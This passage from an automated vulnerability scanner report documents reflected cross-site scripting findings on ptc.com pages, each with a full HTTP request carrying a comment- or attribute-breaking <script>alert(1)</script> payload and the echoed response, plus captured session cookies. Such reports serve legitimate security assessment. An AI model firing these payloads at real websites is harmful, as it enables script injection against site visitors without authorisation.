Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dhttps%25253A//www.ptc.com/common/account/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:07:26 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=CC488059AF4EADC77B936E45650CC794.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44508
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:42:51 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /common3dc21--><script>alert(1)</script>677d085690c/account/index.htm-->
...[SNIP]...

1.33. http://www.ptc.com/common/account/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /common/account/index.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 75071--><script>alert(1)</script>128394af0f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /common/account75071--><script>alert(1)</script>128394af0f7/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dhttps%25253A//www.ptc.com/common/account/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:07:30 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=F4255A4BC4E4A08F5711BF2A61733B9E.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44508
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:42:55 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /common/account75071--><script>alert(1)</script>128394af0f7/index.htm-->
...[SNIP]...

1.34. http://www.ptc.com/common/account/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /common/account/index.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 39e9c--><script>alert(1)</script>ec479487b15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /common/account/index.htm39e9c--><script>alert(1)</script>ec479487b15 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; cookietest=on; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Password; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DPassword%2526pidt%253D1%2526oid%253Dhttps%25253A//www.ptc.com/common/account/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:07:33 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=2F9EE191836985A4CF788A4A8BAF062B.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44508
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:42:59 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /common/account/index.htm39e9c--><script>alert(1)</script>ec479487b15-->
...[SNIP]...

1.35. http://www.ptc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ccd3--><script>alert(1)</script>3b10ecc7201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4ccd3--><script>alert(1)</script>3b10ecc7201 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:02:36 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43362
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:38:01 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /favicon.ico4ccd3--><script>alert(1)</script>3b10ecc7201-->
...[SNIP]...

1.36. http://www.ptc.com/products/mathcad/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /products/mathcad/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2b78c--><script>alert(1)</script>5521b9cc017 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products2b78c--><script>alert(1)</script>5521b9cc017/mathcad/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=control+systems#pq=control+systems&hl=en&cp=5&gs_id=j&xhr=t&q=mathcad&qe=bWF0aGM&qesig=9TbiipYEAZC7WKi55YxjrA&pkc=AFgZ2tmlRroTZvj-GFJ1NJj2q1NtSwFvzq-YtVc3ZLoxwmQ5jKvDaOxkolP84m3mPcjigrxMpDIDTrPXBn6AXtc6rAwuw7c2Bg&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=mathc&aq=0&aqi=g3g-s1&aql=&gs_sm=&gs_upl=&fp=1&biw=1630&bih=1004&bav=on.2,or.r_gc.r_pw.,cf.osb&cad=b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:02:16 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43363
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:37:41 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /products2b78c--><script>alert(1)</script>5521b9cc017/mathcad-->
...[SNIP]...

1.37. http://www.ptc.com/products/mathcad/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /products/mathcad/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3fdb1--><script>alert(1)</script>63b70b3bc0f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/mathcad3fdb1--><script>alert(1)</script>63b70b3bc0f/ HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=control+systems#pq=control+systems&hl=en&cp=5&gs_id=j&xhr=t&q=mathcad&qe=bWF0aGM&qesig=9TbiipYEAZC7WKi55YxjrA&pkc=AFgZ2tmlRroTZvj-GFJ1NJj2q1NtSwFvzq-YtVc3ZLoxwmQ5jKvDaOxkolP84m3mPcjigrxMpDIDTrPXBn6AXtc6rAwuw7c2Bg&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=mathc&aq=0&aqi=g3g-s1&aql=&gs_sm=&gs_upl=&fp=1&biw=1630&bih=1004&bav=on.2,or.r_gc.r_pw.,cf.osb&cad=b
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:02:20 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=169780382FBCEA1F19D573E344917ECC.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43363
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:37:45 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /products/mathcad3fdb1--><script>alert(1)</script>63b70b3bc0f-->
...[SNIP]...

1.38. http://www.ptc.com/services/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /services/index.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f4950--><script>alert(1)</script>de5d021ac34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /servicesf4950--><script>alert(1)</script>de5d021ac34/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:11 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:36 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /servicesf4950--><script>alert(1)</script>de5d021ac34/index.htm-->
...[SNIP]...

1.39. http://www.ptc.com/services/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /services/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60c2"><script>alert(1)</script>4436d76ce00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicesd60c2"><script>alert(1)</script>4436d76ce00/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:07 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45184
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:32 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/servicesd60c2"><script>alert(1)</script>4436d76ce00/index.htm">
...[SNIP]...

1.40. http://www.ptc.com/services/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /services/index.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c03a3--><script>alert(1)</script>5096caf9c1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/index.htmc03a3--><script>alert(1)</script>5096caf9c1a HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:17 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=78FA31E440EDB9EA0538F646A4DB1F04.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Connection: close
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:43 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /services/index.htmc03a3--><script>alert(1)</script>5096caf9c1a-->
...[SNIP]...

1.41. http://www.ptc.com/services/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /services/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dc8"><script>alert(1)</script>a2dbc01909c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/index.htmc4dc8"><script>alert(1)</script>a2dbc01909c HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/services/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:13 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45184
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:39 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/services/index.htmc4dc8"><script>alert(1)</script>a2dbc01909c">
...[SNIP]...

1.42. http://www.ptc.com/solutions/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646cb"><script>alert(1)</script>9caf7550b16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions646cb"><script>alert(1)</script>9caf7550b16/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:06 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:32 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/solutions646cb"><script>alert(1)</script>9caf7550b16/index.htm">
...[SNIP]...

1.43. http://www.ptc.com/solutions/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/index.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload da6c5--><script>alert(1)</script>c54547184b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /solutionsda6c5--><script>alert(1)</script>c54547184b5/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:10 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45188
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:36 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /solutionsda6c5--><script>alert(1)</script>c54547184b5/index.htm-->
...[SNIP]...

1.44. http://www.ptc.com/solutions/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /solutions/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35012"><script>alert(1)</script>54eb8923a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solutions/index.htm35012"><script>alert(1)</script>54eb8923a0d HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/products/mathcad/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Products%20%3E%20Mathcad%20Product%20Page; s_sq=ptc-global-new%2Cptc-ptccom-new%3D%2526pid%253DProducts%252520%25253E%252520Mathcad%252520Product%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.ptc.com/solutions/index.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:05:13 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 45186
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:38 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
